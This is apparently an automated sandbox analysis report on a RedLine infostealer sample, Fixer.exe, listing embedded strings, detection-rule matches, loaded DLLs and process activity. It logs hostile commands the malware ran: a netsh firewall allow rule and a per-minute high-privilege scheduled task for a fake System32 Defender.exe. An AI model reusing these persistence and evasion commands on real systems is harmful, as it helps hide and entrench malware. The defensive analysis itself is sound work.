                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.00000000027E6000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 0000000B.00000002.2583497749.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2754426575.0000000002546000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 6z9uno0baqvej0me.exe.0.dr, BeNEQBpvCUYMUQvO.cs .Net Code: kgykxlqrmnxrTJvFK
                  Source: FixerNerest.exe.0.dr, QEEFRJhvySTxMB.cs .Net Code: zZqXIBvmIbEvDhSnLgO
                  Source: Defender.exe.4.dr, QEEFRJhvySTxMB.cs .Net Code: zZqXIBvmIbEvDhSnLgO

                  System Summary

                  Source: Fixer.exe, type: SAMPLE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: 0.0.Fixer.exe.fd0000.0.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe File dump: Defender.exe.4.dr 750130408
                  Source: C:\Windows\System32\Defender.exe Code function: 17_2_00007FF848F317CD NtProtectVirtualMemory,17_2_00007FF848F317CD
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe File created: C:\Windows\System32\Defender.exe
                  Source: C:\Windows\System32\Defender.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1684 -s 1244
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSecurityHealthSystrayj% vs Fixer.exe
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameexplorerr) vs Fixer.exe
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Fixer.exe
                  Source: Fixer.exe, 00000000.00000000.1999992726.0000000001016000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSteanings.exe8 vs Fixer.exe
                  Source: Fixer.exe, 00000000.00000002.2201510658.000000000173E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Fixer.exe
                  Source: Fixer.exe Binary or memory string: OriginalFilenameSteanings.exe8 vs Fixer.exe
                  Source: Fixer.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Fixer.exe, type: SAMPLE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.0.Fixer.exe.fd0000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: FixerNerest.exe.0.dr, WpAqmEEzEwNIXIzRzOYiu.cs Security API names: File.GetAccessControl
                  Source: FixerNerest.exe.0.dr, WpAqmEEzEwNIXIzRzOYiu.cs Security API names: File.SetAccessControl
                  Source: 6z9uno0baqvej0me.exe.0.dr, YCqdhaRTimJInloXKuRkyyz.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 6z9uno0baqvej0me.exe.0.dr, YCqdhaRTimJInloXKuRkyyz.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: Defender.exe.4.dr, lXExsaLrgYgEOOXK.cs Security API names: File.GetAccessControl
                  Source: Defender.exe.4.dr, lXExsaLrgYgEOOXK.cs Security API names: File.SetAccessControl
                  Source: Defender.exe.4.dr, lXExsaLrgYgEOOXK.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: Defender.exe.4.dr, WpAqmEEzEwNIXIzRzOYiu.cs Security API names: File.GetAccessControl
                  Source: Defender.exe.4.dr, WpAqmEEzEwNIXIzRzOYiu.cs Security API names: File.SetAccessControl
                  Source: 6z9uno0baqvej0me.exe.0.dr, sMngcJoYCfD.cs Security API names: File.GetAccessControl
                  Source: 6z9uno0baqvej0me.exe.0.dr, sMngcJoYCfD.cs Security API names: File.SetAccessControl
                  Source: FixerNerest.exe.0.dr, tisnIiXyTCXvDDO.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: FixerNerest.exe.0.dr, tisnIiXyTCXvDDO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.cs Security API names: File.GetAccessControl
                  Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.cs Security API names: File.SetAccessControl
                  Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: Defender.exe.4.dr, tisnIiXyTCXvDDO.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: Defender.exe.4.dr, tisnIiXyTCXvDDO.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.cs Security API names: File.GetAccessControl
                  Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.cs Security API names: File.SetAccessControl
                  Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/14@1/2
                  Source: C:\Users\user\Desktop\Fixer.exe File created: C:\Users\user\AppData\Local\SystemCache
                  Source: C:\Windows\System32\Defender.exe Mutant created: NULL
                  Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4284
                  Source: C:\Windows\System32\Defender.exe Mutant created: \Sessions\1\BaseNamedObjects\kkepmy41u(qg%$l6
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1684
                  Source: C:\Users\user\Desktop\Fixer.exe File created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe
                  Source: Fixer.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Fixer.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Fixer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                  Source: C:\Users\user\Desktop\Fixer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Fixer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Users\user\Desktop\Fixer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\Defender.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\Defender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\Defender.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\Defender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Fixer.exe File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\Fixer.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: Fixer.exe Virustotal: Detection: 73%
                  Source: Fixer.exe ReversingLabs: Detection: 68%
                  Source: unknown Process created: C:\Users\user\Desktop\Fixer.exe "C:\Users\user\Desktop\Fixer.exe"
                  Source: C:\Users\user\Desktop\Fixer.exe Process created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe"
                  Source: C:\Users\user\Desktop\Fixer.exe Process created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe "C:\Users\user\AppData\Local\Temp\FixerNerest.exe"
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Process created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                  Source: unknown Process created: C:\Windows\System32\Defender.exe C:\Windows\System32\Defender.exe
                  Source: C:\Windows\System32\Defender.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1684 -s 1244
                  Source: unknown Process created: C:\Windows\System32\Defender.exe C:\Windows\System32\Defender.exe
                  Source: C:\Windows\System32\Defender.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4284 -s 1360
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: rasapi32.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: rasman.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: rtutils.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: edputil.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\Fixer.exe Section loaded: wintypes.dll
